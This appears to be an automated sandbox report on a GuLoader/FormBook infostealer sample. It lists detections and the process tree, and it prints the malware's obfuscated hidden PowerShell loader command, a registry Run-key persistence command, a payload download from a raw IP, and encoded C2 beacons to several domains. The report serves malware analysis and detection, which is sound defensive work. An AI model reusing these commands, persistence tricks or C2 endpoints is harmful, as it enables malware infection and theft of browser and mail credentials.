
Windows Analysis Report
160420241245287.exe

Overview

General Information

Sample name: 160420241245287.exe
Analysis ID: 1426828
MD5: 0faf0632777806d9e8c13f1ca6fc3237
SHA1: 35fea792d63ba1e9deec1d2988bc6456322772d5
SHA256: 4585d06cb13de01241bf014db8d49149de7a77a9a0dc13b9007d08a402a035b3
Tags: exe

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • 160420241245287.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\160420241245287.exe" MD5: 0FAF0632777806D9E8C13F1CA6FC3237)
    • powershell.exe (PID: 7304 cmdline: "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7456 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Untapestried.exe (PID: 7908 cmdline: "C:\Users\user\AppData\Local\Temp\Untapestried.exe" MD5: 0FAF0632777806D9E8C13F1CA6FC3237)
        • cmd.exe (PID: 7944 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 8000 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • bvvgQqxLmFZr.exe (PID: 4888 cmdline: "C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • cmd.exe (PID: 8064 cmdline: "C:\Windows\SysWOW64\cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • bvvgQqxLmFZr.exe (PID: 1908 cmdline: "C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 4348 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x3afd3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x24582:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a590:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13b3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: %Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8000, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Lgplante
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7944, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)", ProcessId: 8000, ProcessName: reg.exe
Source: Process started | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7304, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", ProcessId: 7456, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Untapestried.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Untapestried.exe, ParentProcessId: 7908, ParentProcessName: Untapestried.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)", ProcessId: 7944, ProcessName: cmd.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)", CommandLine: "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\160420241245287.exe", ParentImage: C:\Users\user\Desktop\160420241245287.exe, ParentProcessId: 7272, ParentProcessName: 160420241245287.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)", ProcessId: 7304, ProcessName: powershell.exe
No Snort rule has matched

AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: http://103.14.155.180/CkkRLCTUxW193.bin | Virustotal: Detection: 7%
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Virustotal: Detection: 18%
Source: 160420241245287.exe | Virustotal: Detection: 18%
Source: Yara match | File source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\Untapestried.exe | Joe Sandbox ML: detected
Source: 160420241245287.exe | Joe Sandbox ML: detected
Source: 160420241245287.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5~ | source: powershell.exe, 00000001.00000002.2060432087.000000000767E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb | source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887014647.0000000000A4E000.00000002.00000001.01000000.0000000A.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000002.2886634622.0000000000A4E000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: wntdll.pdbUGP | source: Untapestried.exe, 00000007.00000003.2059573045.0000000020323000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.00000000204D0000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.000000002066E000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2057819676.0000000020179000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2155560339.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2157021649.0000000002F22000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP | source: Untapestried.exe, 00000007.00000003.2114834443.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2155304124.00000000201F1000.00000004.00000020.00020000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000003.2085185213.0000000000E0B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: Untapestried.exe, Untapestried.exe, 00000007.00000003.2059573045.0000000020323000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.00000000204D0000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000002.2169142405.000000002066E000.00000040.00001000.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2057819676.0000000020179000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000C.00000003.2155560339.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2157021649.0000000002F22000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP | source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp
Source: Binary string: cmd.pdb | source: Untapestried.exe, 00000007.00000003.2114834443.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Untapestried.exe, 00000007.00000003.2155304124.00000000201F1000.00000004.00000020.00020000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000B.00000003.2085185213.0000000000E0B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdba | source: powershell.exe, 00000001.00000002.2060432087.0000000007705000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\160420241245287.exe | Code function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405772
Source: C:\Users\user\Desktop\160420241245287.exe | Code function: 0_2_0040622D FindFirstFileW,FindClose,0_2_0040622D
Source: C:\Users\user\Desktop\160420241245287.exe | Code function: 0_2_00402770 FindFirstFileW,0_2_00402770
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 12_2_0284B880 FindFirstFileW,FindNextFileW,FindClose,12_2_0284B880
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\opbevaringssteder\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4x nop then xor eax, eax | 12_2_02839430
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4x nop then pop edi | 12_2_02841DAF
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4x nop then pop edi | 12_2_02841DD0

Networking

Source: DNS query: www.eternalsunrise.xyz
Source: Joe Sandbox View | IP Address: 103.14.155.180
Source: Joe Sandbox View | IP Address: 219.94.128.41
Source: Joe Sandbox View | IP Address: 66.29.135.159
Source: Joe Sandbox View | ASN Name: ADVANTAGECOMUS
Source: unknown | TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: global traffic | HTTP traffic detected: GET /CkkRLCTUxW193.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: 103.14.155.180 | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /9pdo/?jzuh=7Bfls2&edR0hF=DnYaRovP48GzkkJrYMXu2fP+AE8bpUHwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMVyf8d4q8oRy488on7FLg2VDUaCWqziINF2DU= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-us | Connection: close | Host: www.ejbodyart.com | User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic | HTTP traffic detected: GET /9pdo/?edR0hF=9/X38tn9qLO2xSF02XNB/rY3zD6RCSMCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFniev+GXC9dB/42VqWS3YgLMlW8u3PKxI03yuVQ=&jzuh=7Bfls2 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-us | Connection: close | Host: www.jt-berger.store | User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic | HTTP traffic detected: GET /9pdo/?edR0hF=REEnkW6M+TEq7R0RTFAEOK6A593ZXFJD8cCdAclTZkEAO29Celit1EJdRt8L6G9Xd5xqtutsMklg2OrtOvYkqvTyuEt4cazTHdJ4IhgWhtZseUa+ZlJk5aI=&jzuh=7Bfls2 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-us | Connection: close | Host: www.n-benriya002.com | User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: global traffic | HTTP traffic detected: GET /9pdo/?edR0hF=exLCvVI2E5RJM8xtzs4Hapiqzu/uGv/f+6d2cWgRCMmdoFVcUWazUq40e3zK6s54E+NAVH76kqhd1uh4f2sEtFmHSsWrMW9P35+QXkOmQzbQkkc9XIR6mDA=&jzuh=7Bfls2 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-us | Connection: close | Host: www.scwspark.com | User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: unknown | DNS traffic detected: queries for: www.ejbodyart.com
Source: unknown | HTTP traffic detected: POST /9pdo/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-us | Content-Type: application/x-www-form-urlencoded | Content-Length: 203 | Connection: close | Cache-Control: no-cache | Host: www.jt-berger.store | Origin: http://www.jt-berger.store | Referer: http://www.jt-berger.store/9pdo/ | User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 | Data Ascii: edR0hF=w9/X/ZL56raZ4hV39Ex2/pEv1ESNbStWWUVrRf8OH6DChAv/LkAhlbXI3JykoWSDcXk17FJvjfBkTxDhNm6m+7KiD9pGw5u1kl64fwmqtW4qz92SBkvcvmxjAYoaCcNV8VW84yXw7v7XtZXWh0fGRslsrEEsrF3i0qt4MPF/0psNt0pyZT8IApwVxTjvxQpj1Q==
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 16 Apr 2024 15:17:00 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Data Ascii: c7<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /9pdo/ was not found on this server.<P></BODY></HTML>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Tue, 16 Apr 2024 15:17:16 GMT | Server: Apache | Content-Encoding: gzip
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Tue, 16 Apr 2024 15:17:18 GMT | Server: Apache | Content-Encoding: gzip
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Tue, 16 Apr 2024 15:17:21 GMT | Server: Apache | Content-Encoding: gzip
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Content-Length: 601 | Connection: close | Date: Tue, 16 Apr 2024 15:17:24 GMT | Server: Apache | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Apr 2024 15:17:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"Data Raw: 35 66 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 6a 61 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 66 6f 6f 74 65 72 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 
6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 70 61 67 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 0a 0a 09 09 3c 21 2d 2d 20 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 34 2e 35 2e 33 2e 31 20 2d 20 61 69 6f 73 65 6f 2e 63 6f 6d 20 2d 2d 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 20 20 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 e7 89 87 e4 bb 98 e3 81 91 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 